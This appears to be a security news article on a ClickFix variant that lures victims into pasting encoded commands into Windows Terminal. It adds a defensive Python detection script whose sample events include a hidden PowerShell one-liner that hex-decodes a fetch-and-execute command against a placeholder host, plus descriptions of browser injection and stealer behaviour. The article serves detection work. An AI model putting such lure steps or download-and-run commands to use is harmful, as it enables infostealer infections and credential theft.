Microsoft has identified a new ClickFix variant that sidesteps detections and controls built around the Run dialog by directing victims to paste the malicious command into Windows Terminal instead. The change of entry point is small for the victim but matters for defenders, because much of the tooling that catches ClickFix keys on the Run dialog.
Innovative Methods to Evade Detection
Traditionally, ClickFix lures have used fake CAPTCHA pages, bogus troubleshooting prompts, and "verification" schemes to trick victims into executing attacker-supplied PowerShell commands, almost always by having them press Windows + R and paste into the Run dialog. This latest iteration instead instructs the victim to open Windows Terminal directly.
According to Microsoft, the new campaign tells users to press Windows + X and then I. Windows + X opens the Quick Link (power user) menu, and I selects the Terminal entry, which launches Windows Terminal (wt.exe) hosting an interactive PowerShell session; on Windows 10 the same keystroke opens Windows PowerShell directly. Because this is a shortcut that administrators genuinely use, the instruction reads as a routine administrative step rather than something suspicious, which lends the lure credibility.
Bypassing Traditional Protections
The attack, observed in February, lets the operators circumvent protections aimed specifically at the Run dialog, such as policies that disable it or detection rules keyed on commands launched from it. Once the victim pastes the command into Windows Terminal, it starts a PowerShell process that decodes a hex-encoded payload embedded in the command, kicking off a multi-stage chain that ends in a Lumma Stealer infection.
That infection chain uses scheduled tasks for persistence, employs anti-malware evasion techniques, and targets browser data and other sensitive information for exfiltration.
Variants and Broader Implications
A second variant also starts with a command pasted into Windows Terminal, but that command launches a batch script via the command prompt, which in turn runs the payload through MSBuild.exe. The MSBuild-hosted code connects to cryptocurrency blockchain RPC endpoints and injects code into chrome.exe and msedge.exe via QueueUserAPC() (APC injection) to harvest web and login data from the browsers.
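The two Windows Terminal chains described above (Win + X, I, then a PowerShell that decodes a hex payload; or cmd.exe running a batch file that launches MSBuild.exe, which then opens browser processes for injection) as lineage-based detection logic over Sysmon-style process-creation (event ID 1) and process-access (event ID 10) records. This is an added example, not Microsoft's or the article's code: the events, GUIDs, paths, rule names, the hex-encoded payload text and the 48-hex-digit threshold are all constructed or assumed for illustration. It also includes a Visual Studio build and a GUID-bearing command line to show that the rules do not fire on that ordinary noise.

```python
"""Detection over constructed Sysmon-style events for the Windows Terminal
ClickFix chains in the article.  Added example, not Microsoft's or the
article's code: events, GUIDs, paths, rule names, the hex payload and the
48-hex-digit threshold are all assumptions made for illustration."""
import json
import ntpath
import re

# Constructed stand-in for the hex-encoded command the lure has the victim
# paste; the decoded text is harmless and points at a reserved domain.
PAYLOAD_HEX = "iwr https://example.invalid/p | iex".encode().hex()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"

# Constructed events; field names follow Sysmon event 1 (ProcessCreate) and
# event 10 (ProcessAccess), all values are invented.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 1, "ProcessGuid": "g-explorer", "ParentProcessGuid": "g-root",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    # Win+X, I: Windows Terminal starts and hosts an interactive PowerShell.
    {"EventID": 1, "ProcessGuid": "g-wt", "ParentProcessGuid": "g-explorer",
     "Image": r"C:\Users\victim\AppData\Local\Microsoft\WindowsApps\wt.exe",
     "CommandLine": "wt.exe"},
    {"EventID": 1, "ProcessGuid": "g-ps-shell", "ParentProcessGuid": "g-wt",
     "Image": _PS, "CommandLine": "powershell.exe"},
    # Variant 1: the pasted command spawns a hidden PowerShell that decodes hex.
    {"EventID": 1, "ProcessGuid": "g-ps-hex", "ParentProcessGuid": "g-ps-shell",
     "Image": _PS, "CommandLine": "powershell -w hidden -c \"$h='" + PAYLOAD_HEX
     + "'; iex (-join ($h -split '(..)' | ? {$_} | % {[char][convert]::ToInt32($_,16)}))\""},
    # Variant 2: the pasted command runs a batch file, which launches MSBuild.exe.
    {"EventID": 1, "ProcessGuid": "g-cmd", "ParentProcessGuid": "g-ps-shell",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c C:\Users\Public\s.bat"},
    {"EventID": 1, "ProcessGuid": "g-msbuild", "ParentProcessGuid": "g-cmd",
     "Image": _MSBUILD, "CommandLine": r"MSBuild.exe C:\Users\Public\t.xml"},
    # MSBuild.exe opens a handle to chrome.exe, which APC injection requires.
    {"EventID": 10, "SourceProcessGUID": "g-msbuild", "TargetProcessGUID": "g-chrome",
     "SourceImage": _MSBUILD, "GrantedAccess": "0x1FFFFF",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    # Benign noise: a Visual Studio build, and a GUID (short hex runs) on a command line.
    {"EventID": 1, "ProcessGuid": "g-devenv", "ParentProcessGuid": "g-explorer",
     "Image": r"C:\VS\Common7\IDE\devenv.exe", "CommandLine": "devenv.exe"},
    {"EventID": 1, "ProcessGuid": "g-msbuild-vs", "ParentProcessGuid": "g-devenv",
     "Image": r"C:\VS\MSBuild\Current\Bin\MSBuild.exe", "CommandLine": "MSBuild.exe app.csproj"},
    {"EventID": 1, "ProcessGuid": "g-ps-task", "ParentProcessGuid": "g-ps-shell", "Image": _PS,
     "CommandLine": "powershell -c \"Get-ScheduledTask -TaskName '{8c6a1f3e-4f2b-4c2a-9d3e-1a2b3c4d5e6f}'\""},
]]

BROWSERS = {"chrome.exe", "msedge.exe"}
# 24 byte pairs = 48 hex digits: longer than any GUID segment, short enough to
# catch a hex-wrapped one-liner.  The threshold is an assumption; tune it.
HEX_BLOB = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){24,}(?![0-9A-Fa-f])")


def _name(path):
    """Lower-cased image basename; ntpath handles Windows paths on any host OS."""
    return ntpath.basename(path).lower()


def load_events(lines):
    return [json.loads(line) for line in lines]


def decode_hex_blobs(cmdline):
    """Decode every long hex run in a command line that yields printable ASCII."""
    found = []
    for m in HEX_BLOB.finditer(cmdline):
        try:
            text = bytes.fromhex(m.group(0)).decode("ascii")
        except ValueError:  # odd digits or non-ASCII bytes: not a text payload
            continue
        if text.isprintable():
            found.append(text)
    return found


def ancestry(event, by_guid):
    """Image names of the process's ancestors, nearest first; cycle-safe."""
    chain, seen, guid = [], set(), event.get("ParentProcessGuid")
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(_name(by_guid[guid]["Image"]))
        guid = by_guid[guid].get("ParentProcessGuid")
    return chain


def detect(events):
    """Apply the three lineage rules; returns one dict per alert."""
    by_guid = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    alerts = []
    for e in events:
        if e["EventID"] == 1:
            image, anc = _name(e["Image"]), ancestry(e, by_guid)
            # Rule 1: PowerShell under Windows Terminal carrying a hex payload.
            if image in ("powershell.exe", "pwsh.exe") and "wt.exe" in anc:
                decoded = decode_hex_blobs(e["CommandLine"])
                if decoded:
                    alerts.append({"rule": "wt_powershell_hex", "guid": e["ProcessGuid"], "detail": decoded})
            # Rule 2: MSBuild.exe reached through cmd.exe from a Windows Terminal session.
            if image == "msbuild.exe" and "cmd.exe" in anc and "wt.exe" in anc:
                alerts.append({"rule": "wt_cmd_msbuild", "guid": e["ProcessGuid"], "detail": anc})
        # Rule 3: MSBuild.exe opening a handle to a browser process.
        elif e["EventID"] == 10 and _name(e["SourceImage"]) == "msbuild.exe":
            target = _name(e["TargetImage"])
            if target in BROWSERS:
                alerts.append({"rule": "msbuild_browser_access", "guid": e["SourceProcessGUID"], "detail": target})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(alert)
```

The point of walking the full ancestor chain rather than checking the direct parent is that the pasted command runs inside the interactive PowerShell that Windows Terminal already hosts, so the process that decodes the payload (or the cmd.exe that runs the batch file) is a grandchild of wt.exe, not a child. On real telemetry, rule 2 needs tuning against developer workstations, and rule 3 should be narrowed by the GrantedAccess mask your Sysmon configuration records for event 10.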
Further complicating the picture, a recently identified variant called InstallFix uses imitation AI tool websites to trick users into running harmful commands, again ending in an infostealer infection.
These ClickFix variants show how quickly the technique adapts once a particular entry point is monitored. For defenders, the practical lesson is that controls tied to a single launch path such as the Run dialog are not enough: detection should key on what the pasted command does, whether a shell spawning PowerShell with encoded content, cmd.exe launching MSBuild.exe, or MSBuild.exe opening handles to browser processes, regardless of where the user typed it.
